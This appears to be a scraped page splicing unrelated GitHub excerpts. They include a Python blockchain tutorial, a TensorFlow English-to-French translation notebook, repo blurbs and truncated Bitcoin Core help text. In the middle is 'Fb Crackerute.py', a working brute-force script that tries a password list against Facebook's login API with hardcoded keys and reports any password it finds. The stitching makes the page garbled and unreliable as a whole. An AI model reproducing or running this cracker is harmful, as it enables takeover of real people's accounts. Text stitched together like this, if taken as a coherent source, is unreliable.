etherceo1x1 / Codes: BUILD YOUR OWN BLOCKCHAIN: A PYTHON TUTORIAL

Download the full Jupyter/iPython notebook from Github here.

Build Your Own Blockchain – The Basics

This tutorial will walk you through the basics of how to build a blockchain from scratch. Focusing on the details of a concrete example will provide a deeper understanding of the strengths and limitations of blockchains. For a higher-level overview, I'd recommend this excellent article from BitsOnBlocks.

Transactions, Validation, and Updating System State

At its core, a blockchain is a distributed database with a set of rules for verifying new additions to the database. We'll start off by tracking the accounts of two imaginary people, Alice and Bob, who will trade virtual money with each other.

We'll need to create a transaction pool of incoming transactions, validate those transactions, and make them into a block. We'll be using a hash function to create a 'fingerprint' for each of our transactions; this hash function links each of our blocks to each other. To make this easier to use, we'll define a helper function to wrap the Python hash function that we're using.

In [1]:
import hashlib, json, sys

def hashMe(msg=""):
    # For convenience, this is a helper function that wraps our hashing algorithm
    if type(msg) != str:
        msg = json.dumps(msg, sort_keys=True)  # If we don't sort keys, we can't guarantee repeatability!

    if sys.version_info.major == 2:
        return unicode(hashlib.sha256(msg).hexdigest(), 'utf-8')
    else:
        return hashlib.sha256(str(msg).encode('utf-8')).hexdigest()

Next, we want to create a function to generate exchanges between Alice and Bob. We'll indicate withdrawals with negative numbers, and deposits with positive numbers. We'll construct our transactions to always be between the two users of our system, and make sure that the deposit is the same magnitude as the withdrawal, i.e. that we're neither creating nor destroying money.

In [2]:
import random
random.seed(0)

def makeTransaction(maxValue=3):
    # This will create valid transactions in the range of (1, maxValue)
    sign      = int(random.getrandbits(1)) * 2 - 1  # This will randomly choose -1 or 1
    amount    = random.randint(1, maxValue)
    alicePays = sign * amount
    bobPays   = -1 * alicePays
    # By construction, this will always return transactions that respect the conservation of tokens.
    # However, note that we have not done anything to check whether these overdraft an account.
    return {u'Alice': alicePays, u'Bob': bobPays}

Now let's create a large set of transactions, then chunk them into blocks.

In [3]:
txnBuffer = [makeTransaction() for i in range(30)]

Next step: making our very own blocks! We'll take the first k transactions from the transaction buffer, and turn them into a block. Before we do that, we need to define a method for checking the validity of the transactions we've pulled into the block.

For Bitcoin, the validation function checks that the input values are valid unspent transaction outputs (UTXOs), that the outputs of the transaction are no greater than the inputs, and that the keys used for the signatures are valid. In Ethereum, the validation function checks that the smart contracts were faithfully executed and respect gas limits. No worries, though: we don't have to build a system that complicated.
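Before moving on to our own rules, one property of hashMe is worth pausing on (this quick check is not part of the original notebook): because json.dumps is called with sort_keys=True, two dictionaries with the same contents produce the same fingerprint regardless of key insertion order.

import hashlib, json

def hashMe(msg=""):
    # Same helper as above, Python 3 branch only
    if type(msg) != str:
        msg = json.dumps(msg, sort_keys=True)
    return hashlib.sha256(str(msg).encode('utf-8')).hexdigest()

a = {u'Alice': -2, u'Bob': 2}
b = {u'Bob': 2, u'Alice': -2}   # same transaction, keys inserted in a different order
assert hashMe(a) == hashMe(b)   # identical fingerprints, thanks to sort_keys
print(hashMe(a)[:16], '...')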
We'll define our own, very simple set of rules which make sense for a basic token system:

- The sum of deposits and withdrawals must be 0 (tokens are neither created nor destroyed)
- A user's account must have sufficient funds to cover any withdrawals

If either of these conditions is violated, we'll reject the transaction.

In [4]:
def updateState(txn, state):
    # Inputs: txn, state: dictionaries keyed with account names, holding
    #   numeric values for transfer amount (txn) or account balance (state)
    # Returns: Updated state, with additional users added to state if necessary
    # NOTE: This does not validate the transaction- just updates the state!

    # If the transaction is valid, then update the state
    state = state.copy()  # As dictionaries are mutable, let's avoid any confusion by creating a working copy of the data.
    for key in txn:
        if key in state.keys():
            state[key] += txn[key]
        else:
            state[key] = txn[key]
    return state

In [5]:
def isValidTxn(txn, state):
    # Assume that the transaction is a dictionary keyed by account names

    # Check that the sum of the deposits and withdrawals is 0
    # (note: '!=' rather than 'is not'- the latter tests identity, not equality, a subtle bug)
    if sum(txn.values()) != 0:
        return False

    # Check that the transaction does not cause an overdraft
    for key in txn.keys():
        if key in state.keys():
            acctBalance = state[key]
        else:
            acctBalance = 0
        if (acctBalance + txn[key]) < 0:
            return False

    return True

Here are a set of sample transactions, some of which are fraudulent- but we can now check their validity!

In [6]:
state = {u'Alice': 5, u'Bob': 5}
print(isValidTxn({u'Alice': -3, u'Bob': 3}, state))             # Basic transaction- this works great!
print(isValidTxn({u'Alice': -4, u'Bob': 3}, state))             # But we can't create or destroy tokens!
print(isValidTxn({u'Alice': -6, u'Bob': 6}, state))             # We also can't overdraft our account.
print(isValidTxn({u'Alice': -4, u'Bob': 2, 'Lisa': 2}, state))  # Creating new users is valid
print(isValidTxn({u'Alice': -4, u'Bob': 3, 'Lisa': 2}, state))  # But the same rules still apply!

True
False
False
True
False

Each block contains a batch of transactions, a reference to the hash of the previous block (if the block number is greater than 1), and a hash of its contents and the header.

Building the Blockchain: From Transactions to Blocks

We're ready to start making our blockchain! Right now, there's nothing on the blockchain, but we can get things started by defining the 'genesis block' (the first block in the system). Because the genesis block isn't linked to any prior block, it gets treated a bit differently, and we can arbitrarily set the system state. In our case, we'll create accounts for our two users (Alice and Bob) and give them 50 coins each.

In [7]:
state = {u'Alice': 50, u'Bob': 50}  # Define the initial state
genesisBlockTxns = [state]
genesisBlockContents = {u'blockNumber': 0, u'parentHash': None, u'txnCount': 1, u'txns': genesisBlockTxns}
genesisHash = hashMe(genesisBlockContents)
genesisBlock = {u'hash': genesisHash, u'contents': genesisBlockContents}
genesisBlockStr = json.dumps(genesisBlock, sort_keys=True)

Great! This becomes the first element from which everything else will be linked.
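Before building on top of it, a quick sanity check (not in the original notebook): the genesis block's stored hash matches a fresh hash of its contents, and it survives the JSON round-trip we'll rely on later when loading the chain from text.

assert hashMe(genesisBlock['contents']) == genesisBlock['hash']

# JSON round-trip, the same serialization we'll use for backups later on
roundTrip = json.loads(genesisBlockStr)
assert hashMe(roundTrip['contents']) == genesisBlock['hash']  # the hash survives serialization
print("genesis block intact:", genesisBlock['hash'][:16], '...')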
In [8]:
chain = [genesisBlock]

For each block, we want to collect a set of transactions, create a header, hash it, and add it to the chain.

In [9]:
def makeBlock(txns, chain):
    parentBlock = chain[-1]
    parentHash  = parentBlock[u'hash']
    blockNumber = parentBlock[u'contents'][u'blockNumber'] + 1
    blockContents = {u'blockNumber': blockNumber, u'parentHash': parentHash,
                     u'txnCount': len(txns), u'txns': txns}
    blockHash = hashMe(blockContents)
    block = {u'hash': blockHash, u'contents': blockContents}
    return block

Let's use this to process our transaction buffer into a set of blocks:

In [10]:
blockSizeLimit = 5  # Arbitrary number of transactions per block-
                    # this is chosen by the block miner, and can vary between blocks!

while len(txnBuffer) > 0:
    bufferStartSize = len(txnBuffer)

    ## Gather a set of valid transactions for inclusion
    txnList = []
    while (len(txnBuffer) > 0) and (len(txnList) < blockSizeLimit):
        newTxn = txnBuffer.pop()
        validTxn = isValidTxn(newTxn, state)  # This will return False if txn is invalid

        if validTxn:  # If we got a valid state, not 'False'
            txnList.append(newTxn)
            state = updateState(newTxn, state)
        else:
            print("ignored transaction")
            sys.stdout.flush()
            continue  # This was an invalid transaction; ignore it and move on

    ## Make a block
    myBlock = makeBlock(txnList, chain)
    chain.append(myBlock)

In [11]:
chain[0]

Out[11]:
{'contents': {'blockNumber': 0,
  'parentHash': None,
  'txnCount': 1,
  'txns': [{'Alice': 50, 'Bob': 50}]},
 'hash': '7c88a4312054f89a2b73b04989cd9b9e1ae437e1048f89fbb4e18a08479de507'}

In [12]:
chain[1]

Out[12]:
{'contents': {'blockNumber': 1,
  'parentHash': '7c88a4312054f89a2b73b04989cd9b9e1ae437e1048f89fbb4e18a08479de507',
  'txnCount': 5,
  'txns': [{'Alice': 3, 'Bob': -3},
   {'Alice': -1, 'Bob': 1},
   {'Alice': 3, 'Bob': -3},
   {'Alice': -2, 'Bob': 2},
   {'Alice': 3, 'Bob': -3}]},
 'hash': '7a91fc8206c5351293fd11200b33b7192e87fad6545504068a51aba868bc6f72'}

As expected, the genesis block includes an invalid transaction which initiates account balances (creating tokens out of thin air). The hash of the parent block is referenced in the child block, which contains a set of new transactions which affect system state. We can now see the state of the system, updated to include the transactions:

In [13]:
state

Out[13]:
{'Alice': 72, 'Bob': 28}

Checking Chain Validity

Now that we know how to create new blocks and link them together into a chain, let's define functions to check that new blocks are valid- and that the whole chain is valid. On a blockchain network, this becomes important in two ways:

- When we initially set up our node, we will download the full blockchain history. After downloading the chain, we would need to run through the blockchain to compute the state of the system. To protect against somebody inserting invalid transactions in the initial chain, we need to check the validity of the entire chain in this initial download.
- Once our node is synced with the network (has an up-to-date copy of the blockchain and a representation of system state), it will need to check the validity of new blocks that are broadcast to the network.

We will need three functions to facilitate this:

- checkBlockHash: A simple helper function that makes sure that the block contents match the hash
- checkBlockValidity: Checks the validity of a block, given its parent and the current system state. We want this to return the updated state if the block is valid, and raise an error otherwise.
- checkChain: Check the validity of the entire chain, and compute the system state beginning at the genesis block.
  This will return the system state if the chain is valid, and raise an error otherwise.

In [14]:
def checkBlockHash(block):
    # Raise an exception if the hash does not match the block contents
    expectedHash = hashMe(block['contents'])
    if block['hash'] != expectedHash:
        raise Exception('Hash does not match contents of block %s' %
                        block['contents']['blockNumber'])
    return

In [15]:
def checkBlockValidity(block, parent, state):
    # We want to check the following conditions:
    # - Each of the transactions are valid updates to the system state
    # - Block hash is valid for the block contents
    # - Block number increments the parent block number by 1
    # - Accurately references the parent block's hash
    parentNumber = parent['contents']['blockNumber']
    parentHash   = parent['hash']
    blockNumber  = block['contents']['blockNumber']

    # Check transaction validity; throw an error if an invalid transaction was found.
    for txn in block['contents']['txns']:
        if isValidTxn(txn, state):
            state = updateState(txn, state)
        else:
            raise Exception('Invalid transaction in block %s: %s' % (blockNumber, txn))

    checkBlockHash(block)  # Check hash integrity; raises error if inaccurate

    if blockNumber != (parentNumber + 1):
        raise Exception('Block number does not increment parent number at block %s' % blockNumber)

    if block['contents']['parentHash'] != parentHash:
        raise Exception('Parent hash not accurate at block %s' % blockNumber)

    return state

In [16]:
def checkChain(chain):
    # Work through the chain from the genesis block (which gets special treatment),
    # checking that all transactions are internally valid,
    # that the transactions do not cause an overdraft,
    # and that the blocks are linked by their hashes.
    # This returns the state as a dictionary of accounts and balances,
    # or returns False if the input could not be parsed
    # (an invalid block raises an exception instead).

    ## Data input processing: Make sure that our chain is a list of dicts
    if type(chain) == str:
        try:
            chain = json.loads(chain)
            assert type(chain) == list
        except:  # This is a catch-all, admittedly crude
            return False
    elif type(chain) != list:
        return False

    state = {}

    ## Prime the pump by checking the genesis block
    # We want to check the following conditions:
    # - Each of the transactions are valid updates to the system state
    # - Block hash is valid for the block contents
    for txn in chain[0]['contents']['txns']:
        state = updateState(txn, state)
    checkBlockHash(chain[0])
    parent = chain[0]

    ## Checking subsequent blocks: These additionally need to check
    # - the reference to the parent block's hash
    # - the validity of the block number
    for block in chain[1:]:
        state = checkBlockValidity(block, parent, state)
        parent = block

    return state

We can now check the validity of the state:

In [17]:
checkChain(chain)

Out[17]:
{'Alice': 72, 'Bob': 28}

And even if we are loading the chain from a text file, e.g. from a backup or loading it for the first time, we can check the integrity of the chain and create the current state:

In [18]:
chainAsText = json.dumps(chain, sort_keys=True)
checkChain(chainAsText)

Out[18]:
{'Alice': 72, 'Bob': 28}

Putting it together: The final Blockchain Architecture

In an actual blockchain network, new nodes would download a copy of the blockchain and verify it (as we just did above), then announce their presence on the peer-to-peer network and start listening for transactions. Bundling transactions into a block, they then pass their proposed block on to other nodes.

We've seen how to verify a copy of the blockchain, and how to bundle transactions into a block. If we receive a block from somewhere else, verifying it and adding it to our blockchain is easy.
Let's say that the following code runs on Node B, which mines the block:

In [19]:
import copy
nodeBchain = copy.copy(chain)
nodeBtxns  = [makeTransaction() for i in range(5)]
newBlock   = makeBlock(nodeBtxns, nodeBchain)

Now assume that the newBlock is transmitted to our node (Node A), and we want to check it and update our state if it is a valid block:

In [20]:
print("Blockchain on Node A is currently %s blocks long" % len(chain))

try:
    print("New Block Received; checking validity...")
    state = checkBlockValidity(newBlock, chain[-1], state)  # Update the state- this will throw an error if the block is invalid!
    chain.append(newBlock)
except:
    print("Invalid block; ignoring and waiting for the next block...")

print("Blockchain on Node A is now %s blocks long" % len(chain))

Blockchain on Node A is currently 7 blocks long
New Block Received; checking validity...
Blockchain on Node A is now 8 blocks long
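To close the loop on why the hash links matter, here is a small tamper-detection experiment (not part of the original tutorial) using only the functions defined above. We flip the direction of one payment deep inside block 1; every transaction still looks individually valid, but the block's stored hash no longer matches its contents, so checkChain rejects the whole chain:

import copy

tampered = copy.deepcopy(chain)
tampered[1]['contents']['txns'][0] = {u'Alice': -3, u'Bob': 3}  # reverse one payment in block 1

try:
    checkChain(tampered)
except Exception as e:
    print("Tampering detected:", e)  # -> Hash does not match contents of block 1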
TobiasVanDyk / VS1053 Micro Midi Synthesizer: 2017: This uses the VLSI VS1053b Audio and Midi DSP chip in its real-time Midi mode. In this mode it acts as a 64-voice polyphonic GM (General Midi) synthesizer. An Arduino Uno standalone micro controls an OLED display and three buttons (Function Select, and Up or Down), and passes the Midi data stream through to the audio DSP. The music board chosen was the Adafruit VS1053 codec breakout board.
potatowaffles / TouchMaiHack: Reads touchscreen data and passes it into a data structure.
rvagg / Archived Level Ttl Cache: A pass-through cache for arbitrary objects or binary data using LevelDB, expired by a TTL.
gabrieldim / JQuery Box Travel: Reads data from JSON and makes an animation in JavaScript, with one box traveling as it passes through the JSON data.
RdH4CK3r / Fb Crackerute.py - Facebook Brute Force # -*- coding: utf-8 -*- ## import os import sys import urllib import hashlib API_SECRET = "62f8ce9f74b12f84c123cc23437a4a32" __banner__ = """ +=======================================+ |..........Facebook Cracker v 1.........| +---------------------------------------+ |#Author: DedSecTL <dtlily> | |#Contact: Telegram @dtlily | |#Date: Fri Feb 8 10:15:49 2019 | |#This tool is made for pentesting. | |#Changing the description of this tool | |Won't made you the coder !!! | |#Respect Coderz | |#I take no responsibilities for the | | use of this program ! | +=======================================+ |..........Facebook Cracker v 1.........| +---------------------------------------+ """ print("[+] Facebook Brute Force\n") userid = raw_input("[*] Enter [Email|Phone|Username|ID]: ") try: passlist = raw_input("[*] Set PATH to passlist: ") if os.path.exists(passlist) != False: print(__banner__) print(" [+] Account to crack : {}".format(userid)) print(" [+] Loaded : {}".format(len(open(passlist,"r").read().split("\n")))) print(" [+] Cracking, please wait ...") for passwd in open(passlist,'r').readlines(): sys.stdout.write(u"\u001b[1000D[*] Trying {}".format(passwd.strip())) sys.stdout.flush() sig = "api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail={}format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword={}return_ssl_resources=0v=1.0{}".format(userid,passwd.strip(),API_SECRET) xx = hashlib.md5(sig).hexdigest() data = "api_key=882a8490361da98702bf97a021ddc14d&credentials_type=password&email={}&format=JSON&generate_machine_id=1&generate_session_cookies=1&locale=en_US&method=auth.login&password={}&return_ssl_resources=0&v=1.0&sig={}".format(userid,passwd.strip(),xx) response = urllib.urlopen("https://api.facebook.com/restserver.php?{}".format(data)).read() if "error" in response: pass else: print("\n\n[+] Password found .. !!") print("\n[+] Password : {}".format(passwd.strip())) break print("\n\n[!] Done .. !!") else: print("fbbrute: error: No such file or directory") except KeyboardInterrupt:
Rushikesh8983 / MastersDataScience Deep Learning Project: Language Translation

In this project, you're going to take a peek into the realm of neural network machine translation. You'll be training a sequence to sequence model on a dataset of English and French sentences that can translate new sentences from English to French.

Get the Data

Since translating the whole language of English to French will take lots of time to train, we have provided you with a small portion of the English corpus.

"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
import helper
import problem_unittests as tests

source_path = 'data/small_vocab_en'
target_path = 'data/small_vocab_fr'
source_text = helper.load_data(source_path)
target_text = helper.load_data(target_path)

Explore the Data

Play around with view_sentence_range to view different parts of the data.

view_sentence_range = (0, 10)

"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
import numpy as np

print('Dataset Stats')
print('Roughly the number of unique words: {}'.format(len({word: None for word in source_text.split()})))

sentences = source_text.split('\n')
word_counts = [len(sentence.split()) for sentence in sentences]
print('Number of sentences: {}'.format(len(sentences)))
print('Average number of words in a sentence: {}'.format(np.average(word_counts)))

print()
print('English sentences {} to {}:'.format(*view_sentence_range))
print('\n'.join(source_text.split('\n')[view_sentence_range[0]:view_sentence_range[1]]))
print()
print('French sentences {} to {}:'.format(*view_sentence_range))
print('\n'.join(target_text.split('\n')[view_sentence_range[0]:view_sentence_range[1]]))

Dataset Stats
Roughly the number of unique words: 227
Number of sentences: 137861
Average number of words in a sentence: 13.225277634719028

English sentences 0 to 10:
new jersey is sometimes quiet during autumn , and it is snowy in april .
the united states is usually chilly during july , and it is usually freezing in november .
california is usually quiet during march , and it is usually hot in june .
the united states is sometimes mild during june , and it is cold in september .
your least liked fruit is the grape , but my least liked is the apple .
his favorite fruit is the orange , but my favorite is the grape .
paris is relaxing during december , but it is usually chilly in july .
new jersey is busy during spring , and it is never hot in march .
our least liked fruit is the lemon , but my least liked is the grape .
the united states is sometimes busy during january , and it is sometimes warm in november .

French sentences 0 to 10:
new jersey est parfois calme pendant l' automne , et il est neigeux en avril .
les états-unis est généralement froid en juillet , et il gèle habituellement en novembre .
california est généralement calme en mars , et il est généralement chaud en juin .
les états-unis est parfois légère en juin , et il fait froid en septembre .
votre moins aimé fruit est le raisin , mais mon moins aimé est la pomme .
son fruit préféré est l'orange , mais mon préféré est le raisin .
paris est relaxant en décembre , mais il est généralement froid en juillet .
new jersey est occupé au printemps , et il est jamais chaude en mars .
notre fruit est moins aimé le citron , mais mon moins aimé est le raisin .
les états-unis est parfois occupé en janvier , et il est parfois chaud en novembre .

Implement Preprocessing Function

Text to Word Ids

As you did with other RNNs, you must turn the text into a number so the computer can understand it.
In the function text_to_ids(), you'll turn source_text and target_text from words to ids. However, you need to add the <EOS> word id at the end of target_text. This will help the neural network predict when the sentence should end.

You can get the <EOS> word id by doing:

target_vocab_to_int['<EOS>']

You can get other word ids using source_vocab_to_int and target_vocab_to_int.

def text_to_ids(source_text, target_text, source_vocab_to_int, target_vocab_to_int):
    """
    Convert source and target text to proper word ids
    :param source_text: String that contains all the source text.
    :param target_text: String that contains all the target text.
    :param source_vocab_to_int: Dictionary to go from the source words to an id
    :param target_vocab_to_int: Dictionary to go from the target words to an id
    :return: A tuple of lists (source_id_text, target_id_text)
    """
    # TODO: Implement Function
    source_id_text = [[source_vocab_to_int[word] for word in sentence.split()]
                      for sentence in source_text.split('\n')]
    target_id_text = [[target_vocab_to_int[word] for word in sentence.split()] + [target_vocab_to_int['<EOS>']]
                      for sentence in target_text.split('\n')]
    return source_id_text, target_id_text

"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
tests.test_text_to_ids(text_to_ids)

Tests Passed

Preprocess all the data and save it

Running the code cell below will preprocess all the data and save it to file.

"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
helper.preprocess_and_save_data(source_path, target_path, text_to_ids)

Check Point

This is your first checkpoint. If you ever decide to come back to this notebook or have to restart the notebook, you can start from here. The preprocessed data has been saved to disk.

"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
import numpy as np
import helper
import problem_unittests as tests

(source_int_text, target_int_text), (source_vocab_to_int, target_vocab_to_int), _ = helper.load_preprocess()

Check the Version of TensorFlow and Access to GPU

This will check to make sure you have the correct version of TensorFlow and access to a GPU.

"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
from distutils.version import LooseVersion
import warnings
import tensorflow as tf
from tensorflow.python.layers.core import Dense

# Check TensorFlow Version
assert LooseVersion(tf.__version__) >= LooseVersion('1.1'), 'Please use TensorFlow version 1.1 or newer'
print('TensorFlow Version: {}'.format(tf.__version__))

# Check for a GPU
if not tf.test.gpu_device_name():
    warnings.warn('No GPU found. Please use a GPU to train your neural network.')
else:
    print('Default GPU Device: {}'.format(tf.test.gpu_device_name()))

TensorFlow Version: 1.1.0
Default GPU Device: /gpu:0

Build the Neural Network

You'll build the components necessary to build a Sequence-to-Sequence model by implementing the following functions below:

- model_inputs
- process_decoder_input
- encoding_layer
- decoding_layer_train
- decoding_layer_infer
- decoding_layer
- seq2seq_model

Input

Implement the model_inputs() function to create TF Placeholders for the Neural Network. It should create the following placeholders:

- Input text placeholder named "input" using the TF Placeholder name parameter with rank 2.
- Targets placeholder with rank 2.
- Learning rate placeholder with rank 0.
- Keep probability placeholder named "keep_prob" using the TF Placeholder name parameter with rank 0.
- Target sequence length placeholder named "target_sequence_length" with rank 1.
- Max target sequence length tensor named "max_target_len" getting its value from applying tf.reduce_max on the target_sequence_length placeholder. Rank 0.
- Source sequence length placeholder named "source_sequence_length" with rank 1.

Return the placeholders in the following tuple: (input, targets, learning rate, keep probability, target sequence length, max target sequence length, source sequence length)

def model_inputs():
    """
    Create TF Placeholders for input, targets, learning rate, and lengths of source and target sequences.
    :return: Tuple (input, targets, learning rate, keep probability, target sequence length,
                    max target sequence length, source sequence length)
    """
    # TODO: Implement Function
    inputs = tf.placeholder(tf.int32, [None, None], 'input')
    targets = tf.placeholder(tf.int32, [None, None])
    learning_rate = tf.placeholder(tf.float32, [])
    keep_prob = tf.placeholder(tf.float32, [], 'keep_prob')
    target_sequence_length = tf.placeholder(tf.int32, [None], 'target_sequence_length')
    max_target_len = tf.reduce_max(target_sequence_length)
    source_sequence_length = tf.placeholder(tf.int32, [None], 'source_sequence_length')
    return inputs, targets, learning_rate, keep_prob, target_sequence_length, max_target_len, source_sequence_length

"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
tests.test_model_inputs(model_inputs)

Tests Passed

Process Decoder Input

Implement process_decoder_input by removing the last word id from each batch in target_data and concatenating the GO ID to the beginning of each batch.

def process_decoder_input(target_data, target_vocab_to_int, batch_size):
    """
    Preprocess target data for encoding
    :param target_data: Target Placeholder
    :param target_vocab_to_int: Dictionary to go from the target words to an id
    :param batch_size: Batch Size
    :return: Preprocessed target data
    """
    # TODO: Implement Function
    go = tf.constant([[target_vocab_to_int['<GO>']]] * batch_size)
    # end = tf.slice(target_data, [0, 0], [-1, batch_size])
    end = tf.strided_slice(target_data, [0, 0], [batch_size, -1], [1, 1])
    return tf.concat([go, end], 1)

"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
tests.test_process_encoding_input(process_decoder_input)

Tests Passed

Encoding

Implement encoding_layer() to create an Encoder RNN layer:

- Embed the encoder input using tf.contrib.layers.embed_sequence
- Construct a stacked tf.contrib.rnn.LSTMCell wrapped in a tf.contrib.rnn.DropoutWrapper
- Pass cell and embedded input to tf.nn.dynamic_rnn()

from imp import reload
reload(tests)

def encoding_layer(rnn_inputs, rnn_size, num_layers, keep_prob,
                   source_sequence_length, source_vocab_size,
                   encoding_embedding_size):
    """
    Create encoding layer
    :param rnn_inputs: Inputs for the RNN
    :param rnn_size: RNN Size
    :param num_layers: Number of layers
    :param keep_prob: Dropout keep probability
    :param source_sequence_length: a list of the lengths of each sequence in the batch
    :param source_vocab_size: vocabulary size of source data
    :param encoding_embedding_size: embedding size of source data
    :return: tuple (RNN output, RNN state)
    """
    # TODO: Implement Function
    embed = tf.contrib.layers.embed_sequence(rnn_inputs, source_vocab_size, encoding_embedding_size)

    def lstm_cell():
        lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size)
        return tf.contrib.rnn.DropoutWrapper(lstm, keep_prob)

    stacked_lstm = tf.contrib.rnn.MultiRNNCell([lstm_cell() for _ in range(num_layers)])
    # initial_state = stacked_lstm.zero_state(source_sequence_length, tf.float32)
    return tf.nn.dynamic_rnn(stacked_lstm, embed, source_sequence_length, dtype=tf.float32)

"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
tests.test_encoding_layer(encoding_layer)

Tests Passed

Decoding - Training

Create a training decoding layer:

- Create a tf.contrib.seq2seq.TrainingHelper
- Create a tf.contrib.seq2seq.BasicDecoder
- Obtain the decoder outputs from tf.contrib.seq2seq.dynamic_decode

def decoding_layer_train(encoder_state, dec_cell, dec_embed_input,
                         target_sequence_length, max_summary_length,
                         output_layer, keep_prob):
    """
    Create a decoding layer for training
    :param encoder_state: Encoder State
    :param dec_cell: Decoder RNN Cell
    :param dec_embed_input: Decoder embedded input
    :param target_sequence_length: The lengths of each sequence in the target batch
    :param max_summary_length: The length of the longest sequence in the batch
    :param output_layer: Function to apply the output layer
    :param keep_prob: Dropout keep probability
    :return: BasicDecoderOutput containing training logits and sample_id
    """
    # TODO: Implement Function
    helper = tf.contrib.seq2seq.TrainingHelper(dec_embed_input, target_sequence_length)
    decoder = tf.contrib.seq2seq.BasicDecoder(dec_cell, helper, encoder_state, output_layer)
    dec_train_logits, _ = tf.contrib.seq2seq.dynamic_decode(decoder, maximum_iterations=max_summary_length)
    # for tensorflow 1.2:
    # dec_train_logits, _, _ = tf.contrib.seq2seq.dynamic_decode(decoder, maximum_iterations=max_summary_length)
    return dec_train_logits  # keep_prob/dropout not used?

"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
tests.test_decoding_layer_train(decoding_layer_train)

Tests Passed

Decoding - Inference

Create inference decoder:

- Create a tf.contrib.seq2seq.GreedyEmbeddingHelper
- Create a tf.contrib.seq2seq.BasicDecoder
- Obtain the decoder outputs from tf.contrib.seq2seq.dynamic_decode

def decoding_layer_infer(encoder_state, dec_cell, dec_embeddings, start_of_sequence_id,
                         end_of_sequence_id, max_target_sequence_length,
                         vocab_size, output_layer, batch_size, keep_prob):
    """
    Create a decoding layer for inference
    :param encoder_state: Encoder state
    :param dec_cell: Decoder RNN Cell
    :param dec_embeddings: Decoder embeddings
    :param start_of_sequence_id: GO ID
    :param end_of_sequence_id: EOS Id
    :param max_target_sequence_length: Maximum length of target sequences
    :param vocab_size: Size of decoder/target vocabulary
    :param output_layer: Function to apply the output layer
    :param batch_size: Batch size
    :param keep_prob: Dropout keep probability
    :return: BasicDecoderOutput containing inference logits and sample_id
    """
    # TODO: Implement Function
    start_tokens = tf.constant([start_of_sequence_id] * batch_size)
    helper = tf.contrib.seq2seq.GreedyEmbeddingHelper(dec_embeddings, start_tokens, end_of_sequence_id)
    decoder = tf.contrib.seq2seq.BasicDecoder(dec_cell, helper, encoder_state, output_layer)
    dec_infer_logits, _ = tf.contrib.seq2seq.dynamic_decode(decoder, maximum_iterations=max_target_sequence_length)
    # for tensorflow 1.2:
    # dec_infer_logits, _, _ = tf.contrib.seq2seq.dynamic_decode(decoder, maximum_iterations=max_target_sequence_length)
    return dec_infer_logits

"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
tests.test_decoding_layer_infer(decoding_layer_infer)
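As an aside (not part of the original notebook), the <GO>/<EOS> bookkeeping above is easier to see on toy data. Here is a small pure-numpy sketch of the same transformation process_decoder_input performs, using a made-up vocabulary:

import numpy as np

# Hypothetical toy vocabulary, for illustration only
target_vocab_to_int = {'<GO>': 0, '<EOS>': 1, 'bonjour': 2, 'le': 3, 'monde': 4}

# A batch of two target sequences, already converted to ids and ending in <EOS>
target_data = np.array([[2, 3, 4, 1],
                        [2, 4, 3, 1]])

# Drop the last id from each row, then prepend the <GO> id-
# this mirrors the tf.strided_slice + tf.concat in process_decoder_input
go = np.full((target_data.shape[0], 1), target_vocab_to_int['<GO>'])
decoder_input = np.concatenate([go, target_data[:, :-1]], axis=1)

print(decoder_input)
# [[0 2 3 4]
#  [0 2 4 3]]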
Sjeanpierre / Passenger Datadog Monitor: Golang application for reporting Phusion Passenger stats to DataDog via statsD.
gardner-lab / Syllable Detector Swift: Using Core Audio to perform STFT and pass the amplitude data into a Matlab-trained neural network.
jeffbski / Pass Stream: pass-stream - pass-through node.js stream which can filter/adapt and pause data.
Eternal973 / Mai22maitouch: Converts mai2touch serial data to 'old cab' maimai game (e.g. maimai FiNALE) touch input; automatically passes the start check.
danimoreira90 / Soccer Data Analysis: A soccer match can generate thousands of data points, from detailed statistics like passes and player movements to more complex data such as a team's performance. In this work we aim to come up with interactive and instructional data visualizations which may allow analysts, technicians, managers and even ordinary fans to make concise decisions.
heru299 / Script Copy: (Bitcoin Core daemon help output)

-?
    Print this help message and exit
-alertnotify=<cmd>
    Execute command when a relevant alert is received or we see a really long fork (%s in cmd is replaced by message)
-assumevalid=<hex>
    If this block is in the chain assume that it and its ancestors are valid and potentially skip their script verification (0 to verify all, default: 0000000000000000000b9d2ec5a352ecba0592946514a92f14319dc2b367fc72, testnet: 000000000000006433d1efec504c53ca332b64963c425395515b01977bd7b3b0, signet: 0000002a1de0f46379358c1fd09906f7ac59adf3712323ed90eb59e4c183c020)
-blockfilterindex=<type>
    Maintain an index of compact filters by block (default: 0, values: basic). If <type> is not supplied or if <type> = 1, indexes for all known types are enabled.
-blocknotify=<cmd>
    Execute command when the best block changes (%s in cmd is replaced by block hash)
-blockreconstructionextratxn=<n>
    Extra transactions to keep in memory for compact block reconstructions (default: 100)
-blocksdir=<dir>
    Specify directory to hold blocks subdirectory for *.dat files (default: <datadir>)
-blocksonly
    Whether to reject transactions from network peers. Automatic broadcast and rebroadcast of any transactions from inbound peers is disabled, unless the peer has the 'forcerelay' permission. RPC transactions are not affected. (default: 0)
-conf=<file>
    Specify path to read-only configuration file. Relative paths will be prefixed by datadir location. (default: bitcoin.conf)
-daemon
    Run in the background as a daemon and accept commands
-datadir=<dir>
    Specify data directory
-dbcache=<n>
    Maximum database cache size <n> MiB (4 to 16384, default: 450). In addition, unused mempool memory is shared for this cache (see -maxmempool).
-debuglogfile=<file>
    Specify location of debug log file. Relative paths will be prefixed by a net-specific datadir location. (-nodebuglogfile to disable; default: debug.log)
-includeconf=<file>
    Specify additional configuration file, relative to the -datadir path (only useable from configuration file, not command line)
-loadblock=<file>
